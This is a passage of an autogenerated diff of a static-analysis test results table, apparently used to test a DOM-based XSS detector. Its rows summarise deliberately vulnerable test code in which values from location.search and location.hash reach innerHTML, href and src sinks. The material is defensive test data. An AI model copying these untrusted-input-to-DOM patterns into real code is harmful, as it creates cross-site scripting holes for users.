URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:466:14:466:29 | row.insertCell() | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:466:14:466:29 | row.insertCell() | enclosingFunctionBody | source document location search table document getElementById mytable table innerHTML source row table insertRow 1 row innerHTML source cell row insertCell cell innerHTML source | +| autogenerated/Xss/DomBasedXss/tst.js:466:14:466:29 | row.insertCell() | enclosingFunctionName | domMethods | +| autogenerated/Xss/DomBasedXss/tst.js:466:14:466:29 | row.insertCell() | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:466:18:466:27 | insertCell | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:466:18:466:27 | insertCell | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:466:18:466:27 | insertCell | enclosingFunctionBody | source document location search table document getElementById mytable table innerHTML source row table insertRow 1 row innerHTML source cell row insertCell cell innerHTML source | +| autogenerated/Xss/DomBasedXss/tst.js:466:18:466:27 | insertCell | enclosingFunctionName | domMethods | +| autogenerated/Xss/DomBasedXss/tst.js:466:18:466:27 | insertCell | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:467:3:467:6 | cell | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:467:3:467:6 | cell | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:467:3:467:6 | cell | enclosingFunctionBody | source document location search table document getElementById mytable table innerHTML source row table insertRow 1 row innerHTML source cell row insertCell cell innerHTML source | +| autogenerated/Xss/DomBasedXss/tst.js:467:3:467:6 | cell | enclosingFunctionName | domMethods | +| autogenerated/Xss/DomBasedXss/tst.js:467:3:467:6 | cell | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:467:3:467:16 | cell.innerHTML | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:467:3:467:16 | cell.innerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:467:3:467:16 | cell.innerHTML | enclosingFunctionBody | source document location search table document getElementById mytable table innerHTML source row table insertRow 1 row innerHTML source cell row insertCell cell innerHTML source | +| autogenerated/Xss/DomBasedXss/tst.js:467:3:467:16 | cell.innerHTML | enclosingFunctionName | domMethods | +| autogenerated/Xss/DomBasedXss/tst.js:467:3:467:16 | cell.innerHTML | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:467:3:467:25 | cell.in ... source | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:467:3:467:25 | cell.in ... source | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:467:3:467:25 | cell.in ... source | enclosingFunctionBody | source document location search table document getElementById mytable table innerHTML source row table insertRow 1 row innerHTML source cell row insertCell cell innerHTML source | +| autogenerated/Xss/DomBasedXss/tst.js:467:3:467:25 | cell.in ... source | enclosingFunctionName | domMethods | +| autogenerated/Xss/DomBasedXss/tst.js:467:3:467:25 | cell.in ... source | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:467:8:467:16 | innerHTML | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:467:8:467:16 | innerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:467:8:467:16 | innerHTML | enclosingFunctionBody | source document location search table document getElementById mytable table innerHTML source row table insertRow 1 row innerHTML source cell row insertCell cell innerHTML source | +| autogenerated/Xss/DomBasedXss/tst.js:467:8:467:16 | innerHTML | enclosingFunctionName | domMethods | +| autogenerated/Xss/DomBasedXss/tst.js:467:8:467:16 | innerHTML | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:467:20:467:25 | source | assignedToPropName | innerHTML | | autogenerated/Xss/DomBasedXss/tst.js:467:20:467:25 | source | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | | autogenerated/Xss/DomBasedXss/tst.js:467:20:467:25 | source | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/tst.js:467:20:467:25 | source | enclosingFunctionBody | source document location search table document getElementById mytable table innerHTML source row table insertRow 1 row innerHTML source cell row insertCell cell innerHTML source | | autogenerated/Xss/DomBasedXss/tst.js:467:20:467:25 | source | enclosingFunctionName | domMethods | | autogenerated/Xss/DomBasedXss/tst.js:467:20:467:25 | source | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:470:1:470:0 | this | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:470:1:470:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:470:1:470:0 | this | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:470:1:470:0 | this | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:470:1:470:0 | this | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:470:1:492:1 | 'arguments' object of function urlStuff | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:470:1:492:1 | 'arguments' object of function urlStuff | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:470:1:492:1 | 'arguments' object of function urlStuff | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:470:1:492:1 | 'arguments' object of function urlStuff | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:470:1:492:1 | 'arguments' object of function urlStuff | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:470:1:492:1 | exceptional return of function urlStuff | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:470:1:492:1 | exceptional return of function urlStuff | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:470:1:492:1 | exceptional return of function urlStuff | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:470:1:492:1 | exceptional return of function urlStuff | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:470:1:492:1 | exceptional return of function urlStuff | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:470:1:492:1 | functio ... OT OK\\n} | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:470:1:492:1 | functio ... OT OK\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:470:1:492:1 | functio ... OT OK\\n} | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:470:1:492:1 | return of function urlStuff | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:470:1:492:1 | return of function urlStuff | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:470:1:492:1 | return of function urlStuff | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:470:1:492:1 | return of function urlStuff | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:470:1:492:1 | return of function urlStuff | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:470:10:470:17 | urlStuff | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:470:10:470:17 | urlStuff | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:470:10:470:17 | urlStuff | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:471:7:471:9 | url | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:471:7:471:9 | url | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:471:7:471:9 | url | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:471:7:471:9 | url | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:471:7:471:9 | url | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:471:7:471:46 | url | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:471:7:471:46 | url | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:471:7:471:46 | url | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:471:7:471:46 | url | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:471:7:471:46 | url | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:471:7:471:46 | url = d ... bstr(1) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:471:7:471:46 | url = d ... bstr(1) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:471:7:471:46 | url = d ... bstr(1) | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:471:7:471:46 | url = d ... bstr(1) | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:471:7:471:46 | url = d ... bstr(1) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:471:13:471:20 | document | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:471:13:471:20 | document | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:471:13:471:20 | document | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:471:13:471:20 | document | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:471:13:471:20 | document | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:471:13:471:29 | document.location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:471:13:471:29 | document.location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:471:13:471:29 | document.location | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:471:13:471:29 | document.location | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:471:13:471:29 | document.location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:471:13:471:36 | documen ... .search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:471:13:471:36 | documen ... .search | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:471:13:471:36 | documen ... .search | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:471:13:471:36 | documen ... .search | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:471:13:471:36 | documen ... .search | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:471:13:471:43 | documen ... .substr | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:471:13:471:43 | documen ... .substr | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:471:13:471:43 | documen ... .substr | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:471:13:471:43 | documen ... .substr | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:471:13:471:43 | documen ... .substr | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:471:13:471:46 | documen ... bstr(1) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:471:13:471:46 | documen ... bstr(1) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:471:13:471:46 | documen ... bstr(1) | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:471:13:471:46 | documen ... bstr(1) | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:471:13:471:46 | documen ... bstr(1) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:471:13:471:46 | exceptional return of documen ... bstr(1) | contextFunctionInterfaces | 